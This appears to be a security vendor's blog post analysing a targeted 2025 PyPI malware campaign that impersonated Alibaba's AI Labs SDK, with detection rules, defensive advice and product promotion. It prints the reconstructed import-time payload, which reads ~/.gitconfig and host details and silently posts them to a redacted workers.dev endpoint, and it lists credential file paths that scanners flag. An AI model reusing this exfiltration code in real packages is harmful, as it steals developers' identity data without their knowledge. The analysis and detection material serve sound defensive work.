Most PyPI malware campaigns are noisy: typosquats of requests, fake GPU libraries, generic infostealers that dump ~/.aws/credentials to a Heroku endpoint. The aliyun-ai-labs campaign is the opposite. Three packages — aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk — appeared on PyPI in mid-2025 with the precision of a targeted operation. Each one impersonates Alibaba's "AI Labs SDK", harvests just enough information to identify the victim's employer, and quietly removes itself. The campaign's targeting profile points squarely at Chinese-region developers working on commercial AI projects, and the lessons it carries about regional supply chain threats apply well outside of PyPI.
What did the packages do?
Each package shipped with a single import-time payload in __init__.py. On install or first import, the code executed three steps in sequence: read ~/.gitconfig, resolve the current machine's external IP address and hostname, and POST the combined payload to a Cloudflare Workers endpoint controlled by the operator. The .gitconfig is the high-signal piece — it typically contains a developer's full name, work email, and (because of GitHub's commit signing model) often the GPG key fingerprint and the organizational unit of any signing certificate. With that data, the operator could correlate a hostname against a specific employee at a specific company, then make a decision about whether to escalate to a second-stage payload.
# Reconstructed first-stage exfiltration (redacted)
import os, json, socket, urllib.request
def _collect():
gitconfig = ""
path = os.path.expanduser("~/.gitconfig")
if os.path.exists(path):
with open(path, "r") as f:
gitconfig = f.read()
payload = {
"host": socket.gethostname(),
"gitconfig": gitconfig,
"user": os.environ.get("USER") or os.environ.get("USERNAME"),
}
req = urllib.request.Request(
"https://<redacted>.workers.dev/collect",
data=json.dumps(payload).encode(),
headers={"Content-Type": "application/json"},
)
urllib.request.urlopen(req, timeout=3)
try:
_collect()
except Exception:
pass
Why is .gitconfig such a high-value target?
In a corporate developer environment, .gitconfig is effectively a small attribution file. The [user] section contains name and email; corporate setups often also configure [commit] with a gpgSign = true directive and a signingKey pointing at a key fingerprint that is verifiable against the company's keyserver or Active Directory smart card system. [url "git@github.com:org-name/"] blocks reveal which GitHub organization the developer works against, and [includeIf "gitdir:~/work/"] clauses leak the on-disk layout that distinguishes work projects from personal ones. For an espionage operator that has a list of target organizations, .gitconfig data lets them go from "this is some Python developer" to "this is a contributor to org X's project Y" without ever touching the source tree.
How did the targeting work?
The three packages used naming that would resonate with developers in China specifically — "Aliyun" is the standard transliteration of Alibaba Cloud's name in the regional market, and Alibaba's AI Labs is a recognizable research division. Developers searching for first-party Alibaba Python tooling in 2025 plausibly encounter these names, especially via AI assistants that hallucinate Chinese-language package equivalents. ReversingLabs noted that the campaign was uploaded during business hours in UTC+8 (China Standard Time) and that the README files contained Simplified Chinese strings. Western package scanners missed the campaign for weeks because none of the names contain requests, urllib3, or other heavy-trigger substrings; PyPI download statistics show fewer than 3,500 cumulative installs before takedown.
What detection rules catch this pattern?
Three high-quality signals identify the regional-targeting pattern. First, any package whose __init__.py reads ~/.gitconfig is suspicious on its own — legitimate libraries have no reason to introspect a developer's git identity at import time. Second, a network call inside __init__.py to a Cloudflare Workers domain is a known operator habit; the *.workers.dev subdomain is cheap, instantly attestable, and rotates fast. Third, the combination of a non-English README and a name that mimics a major regional cloud provider (Aliyun, Yandex, Naver, Kakao) on its first-ever PyPI upload deserves human review.
# Static-detect import-time .gitconfig reads in a wheel
unzip -p package.whl '*.py' | grep -E '\.gitconfig|gitconfig' || echo "clean"
# Hunt installed copies of the known-bad packages
pip list 2>/dev/null | grep -E '^(aliyun-ai-labs-snippets-sdk|ai-labs-snippets-sdk|aliyun-ai-labs-sdk)\s'
# Confirm version, then uninstall
pip show aliyun-ai-labs-sdk 2>/dev/null && pip uninstall -y aliyun-ai-labs-sdk
How does this connect to other 2025 PyPI campaigns?
The same operator profile — sparse install-time code, targeted regional naming, reconnaissance rather than full RAT — shows up in the May 2025 Solana-targeting wave (11 packages that exfiltrated .py source files from developer machines), the February 2025 DeepSeek impersonation packages (deepseekai, deepseeek — these dropped actual infostealers, a noisier sibling), and the long-running North Korean "Contagious Interview" campaign that has placed more than 338 npm and PyPI packages since July 2025. PyPI's Project Quarantine, introduced in August 2024 and expanded in 2025, removed two of the three aliyun packages within hours of community report; the third stayed live longer because the original maintainer email did not bounce and PyPI's policy still requires human review before deletion of an account-active project.
What organizational defenses actually work?
Pin every transitive dependency to a known good version and require a security review before any new top-level dependency is added — the boring controls. Block PyPI installs in CI from any package with fewer than 50 maintainer-published versions or fewer than 1,000 cumulative downloads unless explicitly allowlisted. Forward PIP_INDEX_URL through an internal proxy that mirrors only approved packages and rejects new uploads younger than 14 days, which would have caught all three aliyun packages on freshness alone. And monitor for outbound calls from developer workstations and CI runners to *.workers.dev — that single Cloudflare-side telemetry signal would have flagged this campaign on the first installation.
How Safeguard Helps
Safeguard's PyPI provider plugin scans __init__.py for filesystem reads of credential-style paths (.gitconfig, .aws/credentials, .netrc, .docker/config.json) and outbound network calls at import time — the precise pattern the aliyun campaign uses. The malicious-package feed integrates the three known IOCs and any package newly uploaded with a Workers.dev or Heroku exfiltration endpoint is held in quarantine pending review. Policy gates enforce a minimum package age of 14 days for new top-level Python dependencies, which would have blocked every aliyun-ai-labs install in a Safeguard-protected pipeline. Griffin AI cross-references suspicious uploads against your developer geography to surface regionally targeted campaigns that western scanners miss, and TPRM workflows track regional registry mirror coverage so a Chinese-region team is not silently pulling from a less-audited mirror than your US-region team.